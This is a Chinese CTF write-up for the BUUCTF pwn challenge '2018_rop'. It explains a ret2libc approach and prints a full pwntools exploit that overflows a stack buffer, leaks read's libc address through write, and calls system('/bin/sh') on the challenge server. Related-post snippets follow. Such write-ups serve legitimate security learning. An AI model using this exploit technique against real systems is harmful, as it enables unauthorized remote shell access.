[BUUCTF-pwn]——铁人三项(第五赛区)_2018_rop

  • 题目地址: https://buuoj.cn/challenges#铁人三项(第五赛区)_2018_rop
  • 思路:没有sytem函数,所以应该需要自己去找. 从旁边的函数列表发现了write函数,可以利用将 read 函数的 got所储存的内容泄露出来,泄露出read函数的实际地址 。利用循环调用,再次调用read函数, 然后利用偏移找到system函数和 '/bin/sh'字符串的位置。最后组成payload




exploit

from pwn import *
from LibcSearcher import *
elf = ELF("./2018_rop")
p = remote("node3.buuoj.cn",28628)
read_plt = elf.plt['read']
read_got = elf.got['read']
write_plt = elf.plt['write']
main_addr = 0x080484C6
payload = 'a' * (0x88 + 0x4)
payload += p32(write_plt) + p32(main_addr)
payload += p32(1) + p32(read_got) + p32(8)
p.sendline(payload)
read_addr = u32(p.recv(4))
print hex(read_addr)
libc = LibcSearcher("read", read_addr)
libc_base = read_addr - libc.dump("read")
sys_addr = libc_base + libc.dump("system")
binsh = libc_base + libc.dump("str_bin_sh")
payload = 'a' * (0x88 + 0x4)
payload += p32(sys_addr) + p32(0) + p32(binsh)
p.sendline(payload)
p.interactive()

[BUUCTF-pwn]——铁人三项(第五赛区)_2018_rop相关推荐

  1. BUUCTF(pwn)铁人三项(第五赛区)_2018_rop

    最基本的 rop; from pwn import* from LibcSearcher import* r=remote('node3.buuoj.cn',25292) elf=ELF('./2') ...

  2. [BUUOJ]铁人三项(第五赛区)_2018_rop

    铁人三项(第五赛区)_2018_rop checksec看到保护全关,进IDA分析就是很简单的一串逻辑,在第二个函数处看到了明显的溢出,但是题目里面没有直接提供shell相关操作,所以判断本题为ret ...

  3. BUUCTF 刷题 铁人三项(第五赛区)_2018_rop

    BUUCTF在线评测 直接ret2libc,很简单,但是write函数有三个参数要填充 exp: from pwn import * from LibcSearcher import *context ...

  4. BUUCTF 铁人三项(第五赛区)_2018_rop

    完全可以使用同一个脚本,只需要进行略微修改 比如修改IP 端口 以及查找Libc的模块 BUUCTF jarvisoj_level3_Red-Leaves的博客-CSDN博客

  5. 【BUUCTFPWN】铁人三项(第五赛区)_2018_rop

    先用checksec检查一下,只开了NX,能用栈溢出. IDA反编译一下,里面也很简单,就调用了一个be_nice_to_people和vulnerable_function两个函数. 一次查看一下, ...

  6. “铁人三项”运营、技术、资本无短板,BW期货交易平台要逆天爆发?

    前段时间"交易即挖矿"的交易所大乱战,算是给币圈所有人都上了生动的一课:追热点的交易平台是如何快速"倒闭"的. 有网友统计,能数得上号的"倒闭&quo ...

  7. 信息安全 数据赛 铁人三项_信息安全铁人三项赛-赛事章程-信息安全铁人三项赛...

    赛事章程 竞赛总则 为贯彻<国务院关于大力推进大众创业万众创新若干政策措施的意见><国务院办公厅关于深化高等学校创新创业教育改革的实施意见>,落实中央网信办.国家发改委.教育部 ...

  8. 持续更新 BUUCTF——PWN(三)

    文章目录 前言 axb_2019_heap oneshot_tjctf_2016 护网杯_2018_gettingstart wustctf2020_number_game zctf2016_note ...

  9. 2018信息安全铁人三项第三赛区数据赛题解

    题目链接: https://pan.baidu.com/s/1b6bkW-J8vKASr8C2r9vsdQ 密码: nux4 题目描述 1.黑客攻击的第一个受害主机的网卡IP地址 2.黑客对URL的哪 ...

最新文章

  1. 用计算机唱卡拉ok的配制,在电脑里面可以唱卡拉ok吗?应该怎么做?
  2. 【Linux】3.dpkg、apt安装卸载软件
  3. 无法访问python官网_python写的网站,云服务器经常无法访问
  4. 由Docker的MySQL官方镜像配置的容器无法启动问题解决办法(修改配置后无法启动)
  5. oracle 删除重复记录
  6. 【PyTorch 】静态图与动态图机制
  7. 联想集团委任杨澜为独立董事:任期三年年薪235万元
  8. 关于mybatis的mapper和mapper.xml注入spring托管的方法 超详细
  9. EMNLP2020文档级关系抽取模型GAIN 论文Double Graph Based Reasoning for Document-level Relation Extraction
  10. 多线程、多核技术是什么技术?
  11. 美图手机告别文,写得真好!
  12. How do you calculate log base 2 in Java for integers?
  13. chrome Axure插件(Mac版)
  14. creo绘图属性模板_creo绘图属性
  15. MyBatis 大于小于符号表示
  16. 爬虫 -- 王者荣耀爬虫,爬取每个英雄的皮肤图片
  17. 调css p 段落间距,html P标签段落 CSS段落间距距离调整
  18. 美女硕士养猪记:如何用大数据激活一头猪
  19. ibm笔记本修复计算机开机按,IBM X280开机报错,按了Esc后正常解决方法
  20. 【提交】commit

热门文章

  1. 一个Delphi写的DES算法, 翻译成C#
  2. 114. Flatten Binary Tree to Linked List 二叉树展开为链表
  3. Python视频编辑库:MoviePy
  4. Stark 组件:快速开发神器 —— 自动生成 URL
  5. 树莓派 RespberryPi:通过命令行关机 / 重启
  6. docker 简版教程
  7. 【Tools】Modbus Slave 7安装详解
  8. 【内核驱动】 在内核源码中添加第一个驱动程序
  9. 【Linux系统编程应用】 Linux系统中找不到设备/dev/fb0
  10. 计算机应用专业毕业设计总结,6.1-7(3)2005年计算机应用技术专业毕业生毕业设计和毕业答辩工作总结0207-ZH...